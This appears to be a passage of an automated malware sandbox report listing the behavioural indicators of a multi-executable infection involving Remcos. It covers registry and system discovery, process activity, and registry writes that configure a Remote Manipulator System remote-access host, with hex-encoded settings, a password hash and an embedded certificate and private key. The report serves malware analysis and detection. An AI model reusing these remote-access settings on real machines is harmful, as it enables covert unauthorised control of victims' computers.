| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50to.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000550101\puttyw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wermgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\wermgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\wermgr.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\CalendarRecordSettings = fffe3c003f0078006d006c002000760065007200730069006f006e003d00220031002e0030002200200065006e0063006f00640069006e0067003d0022005500540046002d003100360022003f003e000d000a003c0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e002000760065007200730069006f006e003d0022003700300031003200300022003e003c006d00610069006e005f006f007000740069006f006e0073003e003c006100630074006900760065003e00660061006c00730065003c002f006100630074006900760065003e003c0069006e00740065007200760061006c005f00730068006f0074003e00360030003c002f0069006e00740065007200760061006c005f00730068006f0074003e003c00700072006f0074006500630074005f007200650063006f00720064003e00660061006c00730065003c002f00700072006f0074006500630074005f007200650063006f00720064003e003c0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e00390030003c002f0063006f006d007000720065007300730069006f006e005f007100750061006c006900740079003e003c007300630061006c0065005f007100750061006c006900740079003e003100300030003c002f007300630061006c0065005f007100750061006c006900740079003e003c0063006f006d007000720065007300730069006f006e005f0074007900700065003e0030003c002f0063006f006d007000720065007300730069006f006e005f0074007900700065003e003c006d00610078005f00660069006c0065005f00730069007a0065003e003100300030003c002f006d00610078005f00660069006c0065005f00730069007a0065003e003c006100750074006f005f0063006c006500610072003e00660061006c00730065003c002f006100750074006f005f0063006c006500610072003e003c006100750074006f005f0063006c006500610072005f0064006100790073003e0030003c002f006100750074006f005f0063006c006500610072005f0064006100790073003e003c0075007300650064005f00660069006c0065005f006c0069006d00690074003e0074007200750065003c002f0075007300650064005f00660069006c0065005f006c0069006d00690074003e003c0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e0031003000300030003c002f0061006c006c005f00660069006c00650073005f006c0069006d00690074005f006d0062003e003c0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e0074007200750065003c002f0064007200610077005f006400610074006100740069006d0065005f006f006e005f0069006d006100670065003e003c0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f0063007500730074006f006d005f00720065006d006f00740065005f006400690072006500630074006f00720079003e003c002f006d00610069006e005f006f007000740069006f006e0073003e003c007300630068006500640075006c00650073002f003e003c002f0073007200650065006e005f007200650063006f00720064005f006f007000740069006f006e003e000d000a00 | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Security = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223730313230223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42434536413638363145384133323441454133453342333332363045304634384431354136443844324633323636393041363643463637384533364132383633343444323745303844344145353038363730393646354642463639313232454335434130304342443143423644433941334637443841364435313831443538413c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973742f3e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e313c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a63774d544977496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a63774d544977496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\Certificates = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c636572746966696374655f73657474696e67732076657273696f6e3d223730313230223e3c63657274696669636174653e4c5330744c5331435255644a5469424452564a5553555a4a51304655525330744c533074436b314a5355524b616b4e44515763325a30463353554a425a306c465154553554323936515535435a32747861477470527a6c334d454a4255584e4751555243566b31526333644455566c45566c465252305633536c594b5658704661553144515564424d56564651326433576c5674566e52694d314a735355557861474a746248646b5633686f5a45633565556c47546a566a4d314a73596c524661553144515564424d565646515864335767705662565a30596a4e5362456c464d576869625778335a466434614752484f586c4a526b3431597a4e5362474a5551575647647a423554577042654531715658684f524646345456526159555a334d48704e616b4634436b31715458684f52464634545652615955314756586844656b464b516d644f566b4a425756524262465a5554564e4a64306c42575552575556464c52454a73553170584d585a6b5231566e5646644764574659516a454b596b64474d47497a535764564d3278365a456457644531545358644a51566c45566c46525245524362464e61567a46325a4564565a315258526e566857454978596b64474d47497a535764564d3278365a4564576441704e53556c4353577042546b4a6e6133466f61326c484f586377516b465252555a4251553944515645345155314a53554a445a3074445156464651585a584e554a6e4d556b344f465246614374794e30644465576b7a436a6772526e6c6b6554565255554a56623349314e57705363455a7a55476c48654845354d6d3433626b6f3263545a36596d5a7852575269615770475347314d6347597a596d5a4a62486778566d5a43646c644e5254494b54475532617a426963303174546c5a525a32524361316f3152576435545568365658524a656e70554d6c6c4e5a584a315346426959584234596e4649646b7376566b4a4255485a685a6d3177525856315a6c41724c776f7a595870574e6a644952586f764e6b31495a6a685954474a484d57744e4d6e64785553744b5232745156586f3359577055554646484e6d687353564e76576a645a4d6d4e36516a4e465a697477515452784e6b744b436a5a35627a63316547743151793959537a567961573975645568585655524f4e6d4a5362545a794f484d334e7a644c516b73726557355262316c454e537469647a557264564231616d35564d556454626c6f316155554b4d6b6c76554441796247704964557055556b396e4e6b6f7664474e485157784a593352546130777865453146654746514d6c68444f484130645770494f44553555307874626a5257536d523152584579644468716141707655556c4551564642516b31424d4564445533464855306c694d30525252554a44643156425154524a516b465251554a546545303064555251654642336355637964537435546c6f3265584a585132553157564d31436d5a745a4846564d797430636d3573626e7058526d5176566d5a6d4f446b3354464650645531515154564264564e58596b686a4f5564506555685456464e4e4c3239544d334d775247524652697449656b78784d456f4b5457706a5356644c546d6c4e6333566a4d33704e52466c3259325a714d4578755556704c556d6b77546d3559596e424c63564d35626b466a59556c784d445245636e527061305a7a4d464d324c334d78546b52595a4170336431465065537456615568574d466f764e7a644e53585a7654335a304e6b395a4e31463652546c5a554452464d6b467a5a585a4463797476545556685446686d5632553355466c464d3234785169397a63545643436b316e64557079555568454e6d4e52616b74545a44466154326c764d31706f4e6c4a47556b70355a4535434e79396e4e6a6c68616c6c6c5a485a7965567071646d4e7264315a344e47356c55546b724b304d305a48554b65574e745957565463584e6a627a4a45564570465647646953304972576e4e71553074584d47396f516a5a6a636b683351337035535764525646687a646a56535648704264456c5a5432514b4c5330744c533146546b51675130565356456c4753554e42564555744c5330744c516f3d3c2f63657274696669636174653e3c707269766174655f6b65793e4c5330744c5331435255644a54694251556b6c575156524649457446575330744c533074436b314a535556325a306c4351555242546b4a6e6133466f61326c484f586377516b465252555a4251564e44516b746e6432646e553274425a3056425157394a516b4652517a6c696130644556577036654531545344594b646e4e5a5445744d5a6e6f3057456f7a5447784351555a5461585a7562553548613164334b306c695233497a59575a3159323578636e4a4f64437476556a4631533031565a566c316243396b644468705745685756676f34527a6c5a6431525a6444647856464a3164336c5a4d565a44516a4248556d35725530524a64325a4f557a427155453551576d64344e6e5530597a6c30635735476457396c4f484935565556424b7a6c774b324672436c4d324e5467764e79396b636b3559636e4e6a564641766233646b4c33686a64484e6956314636596b4e775244527259564535564642306355354e4f554669635564566145746f626e5271576e704e53474e534c7a594b61305270636d3976626e4a4c616e5a7552314d3054446c6a636d313153326c6c4e4752615555307a63485248596e463265587032646e4e76525849335332524461476451626a5632524734324e43733254325255565170615332527562556c5557576c6e4c3152685630316c4e47784f52545a45623234724d58645a5131566f6554464c55585a5952586455526d3876576d4e4d655735704e6b316d656d3478535856685a6d685662444930436c4e7959544e355430646f5157644e516b464252554e6e5a305642576a526c597a4277544752794f486777616a68424e45744f4d4731515232395a656e6f315233466b4f5731716556517a61564a6d644731794f54634b61465236644770526356464f54575654576e524556474a31546d7868525764544e6c704661314275624752324e486868636e4178595746536432316f52306842596e4934567a6832646d4e43513170365647395851676f305469387857546c54623063315156566b4d48644d52556c7a596d686953314e46646c5934556b39475154427a576e6c4b54334932516a684f64316834533168545244524e5a32784363574e4b56464a6a54553975436e46774e455a5662554a535a4570715254465851575a6e4e477877643341784f57677852464e554e5574725130647257577856614652484b304a51624551765458523262475648596d564e536b566f55576332576b514b4e445a6a5a474a306245354d526a686f537a46316230686e616d314b5a6b785559575233547a5677616a46694e32566f4e316b786247356a5132467452554a344c3370714d307044596e565253336c485646646c62776f3261326c6a52564d7a546b493161454933656c4979536e4578626c646d4d6e4e6c636d4933526c6c5257554e50596d3944543364534e46464c516d6452524452344d31637662484a564c7a46535969383251316451436a42705a6939694d305a56526e64505a6b6471517a4a6f524870594e6b393054454e6f64486c7753474673546e4248613052764e48527261307047595670324d6c5271536c6450566a424e62473535634464685531634b4b3159764e6c4a324e6a4a554e6e42705a45743363484179626d686a5347466d55327833596c4a42646d64584e446c595257773265554e694b3267785630457755465977656d35765130737964486b336348526d5551706961566f785a6b4e4f6556703454335a734d566c4c566a5a6f616d343351556447555574435a314645517a646a4f545a54626a6378613368756457647853474e4d516e493462456c6d53484a56533256456432777a436d5a6c64324a6e4c3055774c306454576d746c546c52475333646b4e5868424d56646a5245786f5a45464861445a724d336c315a6c5630576a6734643277334d327872626d317a4d325972554645344f5739736358554b525842724b323171566e686b6154463354446c7a4e6d39785a555a4c5455706e654574705533565064456452556d52725a6c45724b304e5662586b7265577458566a526d4f45313254476c49526e6453626c6c5061676f72614851796379394d4f46685253304a6e555551775956424756484e79635573315933706a65574a5164466c7061553574567a426961326c7063584a4e4e576b305a6c427a623368615679744c4d464e7862565630436a463661584673645739364f54466b535668765458524d6345686f61554e5956574e6f6433703661474d765a7974334e55354963565a7561484a724f444d345758685554553974636b525164575a34574768556158514b6556466151556c32623070784b7a5279524770705a6a4a6f5233637a64544a745a6c684e5532394e4d6e6c4b61565972613356464e464e6d516d4a5052455135634552554e4374354b336c4c555574435a30686e6351706f5247356c564530764d445642635535354d58686e59304d314c30686e61336851556a4257536d5976593367334d3246764f484a4955564272547a4d7a56334a444f46425156334e5857544172634770556253744a436b6442516b5976535459335a6b5251534731355745564b4d454e78533068484e57744961585268626e526d51324e304d6a5236566c51315a3151764e6a5256526b6476536c524e65577058593368726230644362314d4b54456478546c5671555652764e314a4d59335a51544374424b7a5247546c526f53307836554642765645743256444533516a4e4e5a45467652304a4253544a35614645725547464a616a64685a6e684855586836564170305555566156316c6e62537379536974545369394864464a796132643153465a4a61326c6e4e4546566353733361574636636e646f624778705a6c6c68566d31346443747059554a4f55476332556d786856566330436b6831554770435a5552745445566a5745396153585a4c6132396d6158527752484a78556e5133625642764e304a4c62554e5664557051644756734d32733053554e4b596d683665564a496345356853555a706448454b566a42326545705a62454e4263574533626b78726147564c51585a4752575a31436930744c533074525535454946425353565a42564555675330565a4c5330744c53304b3c2f707269766174655f6b65793e3c2f636572746966696374655f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\InternetId = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e7465726e65745f69645f73657474696e67732076657273696f6e3d223730313230223e3c696e7465726e65745f69643e3634362d3836382d3739312d3132313c2f696e7465726e65745f69643e3c7573655f696e65745f636f6e6e656374696f6e3e747275653c2f7573655f696e65745f636f6e6e656374696f6e3e3c696e65745f7365727665723e3c2f696e65745f7365727665723e3c7573655f637573746f6d5f696e65745f7365727665723e66616c73653c2f7573655f637573746f6d5f696e65745f7365727665723e3c696e65745f69645f706f72743e353635353c2f696e65745f69645f706f72743e3c7573655f696e65745f69645f697076363e66616c73653c2f7573655f696e65745f69645f697076363e3c696e65745f69645f7573655f70696e3e66616c73653c2f696e65745f69645f7573655f70696e3e3c696e65745f69645f70696e3e3c2f696e65745f69645f70696e3e3c2f726d735f696e7465726e65745f69645f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
